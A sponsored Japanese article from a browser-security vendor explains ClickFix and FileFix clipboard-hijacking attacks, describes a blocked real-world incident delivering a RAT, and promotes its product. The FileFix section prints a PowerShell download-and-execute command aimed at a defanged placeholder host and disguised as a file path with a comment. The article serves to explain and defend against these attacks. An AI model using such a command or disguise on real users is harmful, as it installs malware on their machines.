ClickFixキャンペーンと実際の攻撃、その次世代(FileFix)、およびデバイスが侵害される前にそれを防ぐ方法についての内部情報を紹介します。
ClickFix:クリップボードへの静かなコピー
ClickFixは、脅威アクターが無防備なユーザーを操作し、ウェブページが静かにクリップボードを埋めることを無意識のうちに許可させるために使用する、欺瞞的なソーシャルエンジニアリング手法です。
最終的に攻撃者は、ユーザーが(知らずに)ブラウザから収集され、静かにユーザーのクリップボードに配置された悪意のあるコードを、ホストマシン上で実行させようとしています。
当初「ClickFix」と名付けられたのは、ソーシャルエンジニアリングのプロンプトがユーザーに「ブラウザの問題を修正する」必要があると伝え、要素をクリックするよう求めていたためですが、この用語は現在、ユーザーが要素をクリックし、ページが被害者のクリップボードを埋め、ユーザーに悪意のあるコードをデバイスのターミナルに貼り付けるよう指示する、同様の攻撃全般を指します。
上記のスクリーンショットは、ClickFix攻撃の一例を示しています。ユーザーが偽のCAPTCHAをクリックすると、ページは静かにユーザーのクリップボードに悪意のあるコードを埋め込みます。その後、ユーザーが人間であることを証明するために、(悪意のあるコードを)Windowsの「ファイル名を指定して実行」ダイアログに貼り付けるよう指示が表示されます。
ClickFixの詳細については、ClickFixの概要、理由、場所、仕組みを解説した記事をご覧ください。
ClickFix攻撃を発生源で阻止:ブラウザ内で防御
Keep Awareは、目的特化型のブラウザセキュリティプラットフォームであり、まさに発生場所でリアルタイムに欺瞞的なインタラクションを検知します。
クリップボードアクセスのパターンを監視し、不審なウェブページをフラグし、ClickFixのような横展開技術を妨害することで、Keep Awareは組織が攻撃をブラウザの段階で封じ込め、ホストに到達する前に阻止できるよう支援します。
実際の攻撃例:Google検索結果からClickFix試行へ
Keep Awareの顧客が最近、実際の環境でClickFix攻撃に遭遇しました。検索エンジンの結果を閲覧中、ユーザーが侵害されたサイトをクリックしました。このサイトには悪意のあるJavaScriptが注入されており、最終的にNetSupportManager RATバックドアを展開することを目的としたClickFixプロンプトが表示されました。
ユーザーはプロンプトをクリックし、ページがクリップボード(悪意のあるPowerShell)を埋めることを許可し、デバイスのターミナルに貼り付けるよう指示されました。
しかし、Keep Awareはページがクリップボードに埋め込もうとした不審なコマンドを特定・ブロックし、ユーザーに警告を表示したことで、デバイスの侵害を効果的に防ぎました。
下記の動画は、この侵害されたサイトで訪問者が体験する内容、つまり偽のCAPTCHA認証フレームを紹介しています。偽のCAPTCHAをクリックすると、悪意のあるJavaScriptがユーザーのクリップボードを悪意のあるPowerShellコードで更新し、Windowsの「ファイル名を指定して実行」ダイアログに貼り付けるよう促します。
以下は、Keep Awareのセーフガードがなかった場合にユーザーの行動がどのようになったかのウォークスルーです。ユーザーの操作を制限し、クリップボードをクリアする仕組みがなかった場合の例です。
もしこのソーシャルエンジニアリング手法が成功し、技術的なコントロールがなかった場合、ユーザーは知らずに悪意のあるPowerShellコードを実行していたことになります。
これにより、一連のダウンロード、難読化解除、マルウェアのホストマシン上での組み立て、ユーザーの「Run」レジストリキーへの永続化設定が始まり、マルウェアは侵害されたデバイス上で永続し、ユーザーがコンピュータアカウントにログインするたびに実行されるようになります。
この実際の攻撃について、初期のダウンロードクレードルやその後のPowerShellコードなど、詳細はステップバイステップの解説をご覧ください。
影響:RAT、情報窃取型マルウェアなど
ClickFix攻撃は、悪意のあるJavaScript、クリップボード操作、ソーシャルエンジニアリングを利用して、最終的に攻撃者がブラウザからホストデバイスへのアクセスを得ることを目的としています。
これは悪意のあるウェブページや侵害されたウェブページの両方で確認されており、複数の脅威グループによって被害者のマシンへのアクセス獲得、最終的にはマルウェアやリモートアクセス型トロイの木馬(RAT)の展開に利用されています。AsyncRAT、Skuld Stealer、Lumma Stealer、DarkGateマルウェア、DanaBot Stealerなどが含まれます。
技術的な防御策がなければ、これら一見単純なクリップボード攻撃はシステム全体の侵害に発展し、脅威アクターにリモートコントロールや機密データへのアクセス、検出が困難で除去も困難な永続的な足場を与えることになります。
次世代:FileFix
FileFixはClickFixの次世代、つまり弟分にあたる攻撃で、クリップボード操作を利用し、ユーザーを騙してブラウザ外でコードを実行させることを狙った新たな手法です。今年6月下旬にセキュリティ研究者mr.d0xによって初めて文書化され、FileFixはユーザーにコマンドを直接File Explorerのアドレスバーに貼り付けさせるもので、脅威アクターはすでにこの新しい手法を取り入れています。
一見すると、貼り付けた出力は無害で、標準的なWindowsのファイルパスのように見えます。しかし、先頭には悪意のあるコマンドが隠されており、その後に続く「ファイルパス」はコメントとして本当の脅威を覆い隠しています。
Powershell.exe -c "iwr malicious[.]site/mal.jpg|iex" # C:\Organization\Internal\Drive\Business-RFP.pdfユーザーのクリップボードにコピーされる全データは、コメントでファイルパスが付加された悪意のあるPowerShellコマンドです。
下の画像で分かるように、エクスプローラーのアドレスバーに表示される一見無害なファイルパスは、実際にはPowerShellコマンドがユーザーの目に見えない形で隠されています。
ClickFixと同様に、FileFix攻撃もブラウザから始まり、ソーシャルエンジニアリング、クリップボードインジェクション、ユーザーの操作に依存してブラウザとホストの境界を越えます。FileFixは本質的に、ファイルエクスプローラーの利用に特化したClickFix攻撃です。
- どちらもブラウザ内で発生します。
- どちらも同じクリップボード埋め込み技術を使用します。
- どちらも悪意のある、または侵害されたウェブサイトを利用し、信頼できるウェブトラフィックと悪意のあるトラフィックの境界を曖昧にします。
- どちらもホストデバイスへの攻撃者のアクセスにつながります。
つまり、FileFixもClickFixと同じ方法で阻止できます。Keep Awareのようなブラウザネイティブのセキュリティソリューションは、クリップボード埋め込みの試みをリアルタイムで検知し、疑わしいコードがホストデバイスに到達する前に遮断します。だからこそ、ブラウザに組み込まれたポリシーが侵害を未然に防ぐのです。
ブラウザセキュリティが主役に
ClickFixとFileFix攻撃は、多くのセキュリティ戦略における重大な死角、すなわちブラウザがホスト侵害の経路となることを明らかにしています。これらのクリップボードベースの手法は、ソーシャルエンジニアリングを利用し、一見正当、あるいは侵害されたウェブサイトとのユーザーのやり取りを悪用して悪意のあるコードを配信します。
ブラウザのアクティビティの可視性やクリップボードアクセスの制御がなければ、従来の防御策は初期兆候を見逃します。しかし、ブラウザネイティブのインサイトとリアルタイムのクリップボード保護があれば、組織は攻撃の発生源でこれらを遮断し、ホスト上でコードが実行される前に食い止めることができます。
Keep Awareでは、従来のセキュリティツールが、従業員が最も利用し、攻撃者が最も狙うブラウザの保護においていかに不十分かを実感してきました。だからこそ私たちは、クリップボード操作やその他のブラウザベースの攻撃を、実害が生じる前に検知・ブロックするプラットフォームを構築しました。
さらに詳しく知りたい方は、こちらからデモをリクエストしてください。
また、私たちはイノベーション分野で、Black Hat USA 2025 Startup Spotlightファイナリスト4社のうちの1社に選ばれたことを誇りに思います。今後も、組織がブラウザ――現代の仕事が始まり、攻撃も始まる場所――をどのように保護・管理するかを再定義していきます。
来週Black Hat USA 2025にご参加予定の方は、私たちのプレゼンテーションをご覧いただくか、Keep Awareブースにお立ち寄りいただくか、イベント会場でチームとお話しする時間を予約してください。
スポンサー:Keep Awareによる寄稿記事です。